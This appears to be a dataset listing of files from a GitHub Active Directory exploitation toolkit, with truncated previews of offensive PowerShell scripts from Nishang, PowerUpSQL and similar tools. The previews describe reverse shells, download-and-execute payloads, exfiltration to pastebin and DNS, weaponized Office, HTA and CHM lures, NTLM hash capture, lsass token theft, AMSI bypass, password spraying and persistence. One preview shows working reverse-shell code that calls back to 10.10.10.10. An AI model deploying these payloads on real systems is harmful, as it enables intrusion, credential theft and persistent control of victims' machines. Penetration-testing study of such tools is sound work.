2,733
master
109,752
<# Script: SQLC2.ps1 Description: This is a basic PoC script that contains functions that can be used to install and manage a C2 via a SQL Server instance. The C2 SQL Server is intended to be hosted remotely or in Azure via a database.windows.net address. The client functions can be ru...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/PowerUpSQL/scripts/pending/Invoke-SqlServer-Persist-StartupSp.psm1
PowerShell
mit
2,733
master
17,811
function Invoke-SqlServer-Persist-StartupSp { <# .SYNOPSIS This script can be used backdoor a Windows system using a SQL Server startup stored procedure. This is done marking a user defined stored procedure to run when the SQL Server is restarted using the native sp_procoption stored procedure. Note: This scri...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Invoke-PowerShellTcpOneLine/Invoke-PowerShellTcpOneLine.ps1
PowerShell
mit
2,733
master
531
# Nikhil SamratAshok Mittal $client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $dat...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Invoke-SDPropagator/Invoke-SDPropagator.ps1
PowerShell
mit
2,733
master
2,776
 function Invoke-SDPropagator <# .Description Invoke the SDPropagator on the current domain (users domain) .Parameter ShowProgress Display progress and wait for sdpropagation to complete use -showprogress:$false to not wait for propagation to complete. .Parameter TimeoutMinutes The number of minutes to wait for S...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Invoke-DomainPasswordSpray/DomainPasswordSpray.ps1
PowerShell
mit
2,733
master
19,105
function Invoke-DomainPasswordSpray{ <# .SYNOPSIS This module performs a password spray attack against users of a domain. By default it will automatically generate the userlist from the domain. Be careful not to lockout any accounts. DomainPasswordSpray Function: Invoke-DomainPasswordSpray Author:...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/AmsiScanBufferBypass/ASBBypass.ps1
PowerShell
mit
2,733
master
785
$Win32 = @" using System; using System.Runtime.InteropServices; public class Win32 { [DllImport("kernel32")] public static extern IntPtr GetProcAddress(IntPtr hModule, string procName); [DllImport("kernel32")] public static extern IntPtr LoadLibrary(string name); [DllImport("kernel32")] pub...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Set-AD-ACL/Set-ADACL.ps1
PowerShell
mit
2,733
master
2,643
#requires -Modules ActiveDirectory function Set-ADACL { [CmdletBinding()] Param( [Parameter(Position = 1, Mandatory = $False)] [String] $SAMAccountName, [Parameter(Position = 2, Mandatory = $False)] [String] $DistinguishedName, [Parameter(Positio...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Deploy-Deception-master/Deploy-Deception.psm1
PowerShell
mit
2,733
master
360
 <# Import this module to load all the functions in Deploy-Deception in the current PowerShell session. PS > Import-Module C:\Deploy-Deception\Deploy-Deception.psm1 #> if(!$PSScriptRoot) { $PSScriptRoot = Split-Path $MyInvocation.MyCommand.Path -Parent } $PSScriptRoot Get-ChildItem -Recurse $PSScriptRoot *.ps...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Deploy-Deception-master/Deploy-Deception.ps1
PowerShell
mit
2,733
master
44,741
#Requires –Modules ActiveDirectory <# File: Deploy-Deception.ps1 Author: Nikhil Mittal (@nikhil_mitt) Description: A PowerShell module to deploy active directory decoy objects. Required Dependencies: ActiveDirectory Module by Microsoft #> ##################################### Helper Functions ####################...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/nishang.psm1
PowerShell
mit
2,733
master
929
<# Import this module to use all the scripts in Nishang, except Keylogger, in the current PowerShell session. The module must reside in the Nishang folder. PS > Import-Module .\nishang.psm1 http://www.labofapenetrationtester.com/2014/06/nishang-0-3-4.html https://github.com/samratashok/nishang #> if(!$PSScriptRoot)...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/Utility/Add-Persistence.ps1
PowerShell
mit
2,733
master
6,846
function Add-Persistence { <# .SYNOPSIS Nishang script which could be used to make execution of a PowerShell script from disk or URL reboot persistent using WMI permannet event consumer. .DESCRIPTION This script accepts path of a script or URL which is then executed on every reboot persistently. In case the PayloadScr...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/Utility/Do-Exfiltration.ps1
PowerShell
mit
2,733
master
6,113
function Do-Exfiltration { <# .SYNOPSIS Use this script to exfiltrate data from a target. .DESCRIPTION This script could be used to exfiltrate data from a target to gmail, pastebin, a webserver which could log POST requests and a DNS Server which could log TXT queries. To decode the data exfiltrated by webserver and D...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/Utility/TexttoExe.ps1
PowerShell
mit
2,733
master
931
function TexttoEXE { <# .SYNOPSIS Nishang script to convert a PE file in hex format to executable .DESCRIPTION This script converts a PE file in hex to executable and writes it to user temp. .PARAMETER Filename Path of the hex text file from which executable will be created. .PARAMETER EXE Path where the executable...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/Utility/Add-Exfiltration.ps1
PowerShell
mit
2,733
master
7,512
function Add-Exfiltration { <# .SYNOPSIS Use this script to exfiltrate data from a target. .DESCRIPTION This script can be used to exfiltrate data from a target to Gmail, Pastebin, a web server which can log POST requests, or a DNS server which can log TXT queries. To decode the data exfiltrated by the web server and ...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/Utility/ExetoText.ps1
PowerShell
mit
2,733
master
926
function ExetoText { <# .SYNOPSIS Nishang script to convert an executable to text file. .DESCRIPTION This script converts and an executable to a text file. .PARAMETER EXE The path of the executable to be converted. .PARAMETER FileName Path of the text file to which executable will be converted. .EXAMPLE PS > ExetoT...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/Utility/Download.ps1
PowerShell
mit
2,733
master
806
function Download { <# .SYNOPSIS Nishang Payload to download a file in current users temp directory. .DESCRIPTION This payload downloads a file to the given location. .PARAMETER URL The URL from where the file would be downloaded. .PARAMETER FileName Name of the file where download would be saved. .EXAMPLE PS > Dow...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/Utility/Parse_Keys.ps1
PowerShell
mit
2,733
master
6,925
function Parse_Keys { <# .SYNOPSIS A script which could be used to parse keys logged by Kelogger payload of Nishang. .DESCRIPTION This script parses keys logged by Keylogger payload of Nishang. .PARAMETER RawKeys Name of the text file which contains logged keys. .PARAMETER LoggedKeys Name of the text file where par...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/Utility/Invoke-Encode.ps1
PowerShell
mit
2,733
master
4,722
function Invoke-Encode { <# .SYNOPSIS Script for Nishang to encode and compress plain data. .DESCRIPTION The script asks for a path to a plain file or string, encodes it and writes to a file "encoded.txt" in the current working directory. If the switch -OutCommand is used. An encoded command which could be executed o...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/Utility/StringToBase64.ps1
PowerShell
mit
2,733
master
1,327
function StringtoBase64 { <# .SYNOPSIS Nishang script which encodes a string to base64 string. .DESCRIPTION This payload encodes the given string to base64 string and writes it to base64encoded.txt in current directory. .PARAMETER Str The string to be encoded .PARAMETER OutputFile The path of the output file. Defau...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/Utility/Start-CaptureServer.ps1
PowerShell
mit
2,733
master
6,351
function Start-CaptureServer { <# .SYNOPSIS Nishang script which could be used to capture user crednetials in plain or SMB hashes. .DESCRIPTION The script starts a listener on specified IP and port. When using Basic Authtype, any user connecting to the server will be presented with a credentials prompt, if a user ente...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/Utility/Remove-Persistence.ps1
PowerShell
mit
2,733
master
3,014
function Remove-Persistence { <# .SYNOPSIS Nishang script which could be used to clear the persistence added by Nishang payloads and scripts. .DESCRIPTION This script cleans WMI events and Registry keys added by various payloads and Add-persistence script. Run the script as an Administrator to remove the WMI events. ...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/Utility/Invoke-Decode.ps1
PowerShell
mit
2,733
master
1,894
function Invoke-Decode { <# .SYNOPSIS Script for Nishang to decode the data encoded by Invoke-Encode, DNS TXT and POST exfiltration methods. .DESCRIPTION The script asks for an encoded string as an option, decodes it and writes to a file "decoded.txt" in the current working directory. Both the encoding and decoding is...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/Utility/Out-DnsTxt.ps1
PowerShell
mit
2,733
master
4,001
function Out-DnsTxt { <# .SYNOPSIS Script for Nishang to generate DNS TXT records which could be used with other scripts. .DESCRIPTION Use this script to generate DNS TXT records to be used with DNS_TXT_Pwnage and Execute-DNSTXT-Code. The script asks for a path to a plain file or string, compresses and encodes it and...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/Utility/ConvertTo-ROT13.ps1
PowerShell
mit
2,733
master
1,318
function ConvertTo-ROT13 { <# .SYNOPSIS Nishang script which can encode a string to ROT13 or decode a ROT13 string. .DESCRIPTION Nishang script which can encode a string to ROT13 or decode a ROT13 string. .PARAMETER rot13string The string which needs to be encoded or decode. .EXAMPLE PS > ConvertTo-ROT13 -rot13stri...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/Utility/Base64ToString.ps1
PowerShell
mit
2,733
master
1,343
function Base64ToString { <# .SYNOPSIS Nishang script which decodes a base64 string to readable. .DESCRIPTION This payload decodes a base64 string to readable. .PARAMETER Base64Strfile The filename which contains base64 string to be decoded. Default is "decoded.txt" in the current working directory. Use the parameter...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/Client/Out-WebQuery.ps1
PowerShell
mit
2,733
master
3,183
function Out-WebQuery { <# .SYNOPSIS Nishang script which creates a Web Query (.iqy) file which can be used for phishing attacks. .DESCRIPTION The script generates a Web Query (.iqy). When a target opens the file, it is opened inside an Excel Sheet and the user is presented with a warning for enabling data connection....
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/Client/Out-SCT.ps1
PowerShell
mit
2,733
master
3,517
function Out-SCT { <# .SYNOPSIS Nishang script useful for creating "weaponized" SCT files which could be used to run PowerShell commands and scripts. .DESCRIPTION The script generates a SCT file with an XML extension. The file (default name UpdateCheck.xml) needs to be hosted on a web server and using regsvr32 built-...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/Client/Out-SCF.ps1
PowerShell
mit
2,733
master
1,692
function Out-SCF { <# .SYNOPSIS Nishang script useful for creating SCF files which could be used to capture NTLM hashes. .DESCRIPTION The script generates a SCF file. The file (default name "SystemCatalog.scf") needs to be put on a share. Whenever a user opens the file on the share, his credentials are sent to the sp...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/Client/Out-Shortcut.ps1
PowerShell
mit
2,733
master
4,336
function Out-Shortcut { <# .SYNOPSIS Nishang script which creates a shortcut capable of launching PowerShell commands and scripts. .DESCRIPTION The script generates a shortcut (.lnk). When a target opens the shortcut, the predefined powershell scripts and/or commands get executed. A hotkey for the shortcut could also ...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/Client/Out-Excel.ps1
PowerShell
mit
2,733
master
19,112
function Out-Excel { <# .SYNOPSIS Nishang Script which can generate and "infect" existing excel files with an auto executable macro or DDE. .DESCRIPTION The script can create as well as "infect" existing excel files with an auto executable macro or DDE. Powershell or other payloads could be exeucted using the genere...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/Client/Out-Word.ps1
PowerShell
mit
2,733
master
17,660
function Out-Word { <# .SYNOPSIS Nishang Script which can generate as well as "infect" existing word files with an auto executable macro or DDE. .DESCRIPTION The script can create as well as "infect" existing word files with an auto executable macro or DDE. Powershell or other payloads could be exeucted using the gen...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/Client/Out-HTA.ps1
PowerShell
mit
2,733
master
5,265
function Out-HTA { <# .SYNOPSIS Nishang script which could be used for generating "infected" HTML Application. It could be deployed on a web server and PowerShell scripts and commands could be executed on the target machine. .DESCRIPTION The script generates a HTA file with inline VBScript. The HTA should be deployed...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/Client/Out-JS.ps1
PowerShell
mit
2,733
master
2,910
function Out-JS { <# .SYNOPSIS Nishang script useful for creating "weaponized" JavaScript file which could be used to run PowerShell commands and scripts. .DESCRIPTION The script generates a JavaScript file. The JavaScript file (default name Style.js) needs to be sent to a target. As soon as a target user opens the J...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/Client/Out-Java.ps1
PowerShell
mit
2,733
master
7,077
function Out-Java { <# .SYNOPSIS Nishang script which could be used for generating JAR to be used for applets. .DESCRIPTION The script generates a Signed JAR and one line HTML code. These could be deployed on a web server. When a target opens up the URL hosting these, the predefined PowerShell commands and scripts co...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/Client/Out-CHM.ps1
PowerShell
mit
2,733
master
19,502
function Out-CHM { <# .SYNOPSIS Nishang script useful for creating Compiled HTML Help file (.CHM) which could be used to run PowerShell commands and scripts. .DESCRIPTION The script generates a CHM file which needs to be sent to a target. You must have hhc.exe (HTML Help Workshop) on your machine to use this script. ...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/Execution/Execute-Command-MSSQL.ps1
PowerShell
mit
2,733
master
6,473
function Execute-Command-MSSQL { <# .SYNOPSIS Nishang payload which could be used to execute commands remotely on a MS SQL server. .DESCRIPTION This payload needs a valid administrator username and password on remote SQL server. It uses the credentials to enable xp_cmdshell and provides a powershell shell, a sql shell...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/Execution/Out-RundllCommand.ps1
PowerShell
mit
2,733
master
3,956
function Out-RundllCommand { <# .SYNOPSIS Nishang script that can be used for generating rundll32.exe one line commands to run PowerShell commands and scripts or a reverse PowerShell session. Also useful for bypassing AppLocker. .DESCRIPTION This script generates rundll32 commands which can be used to to run PowerShe...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/Execution/Download-Execute-PS.ps1
PowerShell
mit
2,733
master
1,933
function Download-Execute-PS { <# .SYNOPSIS Nishang Payload which downloads and executes a powershell script. .DESCRIPTION This payload downloads a powershell script from specified URL and then executes it on the target. Use the -nowdownload option to avoid saving the script on the target. Otherwise, the script is sav...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/Execution/Execute-DNSTXT-Code.ps1
PowerShell
mit
2,733
master
4,609
function Execute-DNSTXT-Code { <# .SYNOPSIS Payload which could execute shellcode from DNS TXT queries. .DESCRIPTION This payload is able to pull shellcode from txt record of a domain. Below commands could be used to generate shellcode to be usable with this script ./msfvenom -p windows/meterpreter/reverse_https -f p...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/Execution/Download_Execute.ps1
PowerShell
mit
2,733
master
1,887
function Download_Execute { <# .SYNOPSIS Nishang Payload to download an executable in text format, convert it to executable and execute. .DESCRIPTION This payload downloads an executable in text format, converts it to executable and execute. Use exetotext.ps1 script to change an executable to text .PARAMETER URL The ...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/Escalation/Enable-DuplicateToken.ps1
PowerShell
mit
2,733
master
5,345
function Enable-DuplicateToken { <# .SYNOPSIS Nishang payload which duplicates the Access token of lsass and sets it in the current process thread. .DESCRIPTION This payload duplicates the Access token of lsass and sets it in the current process thread. The payload must be run with elevated permissions. .EXAM...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Nishang/Escalation/Remove-Update.ps1
PowerShell
mit
2,733
master
2,229
function Remove-Update { <# .SYNOPSIS Nishang Payload which silently removes updates for a target machine. .DESCRIPTION This payload removes updates from a target machine. This could be used to remove all updates, all security updates or a particular update. .PARAMETER KBID THE KBID of update you want to remove. All...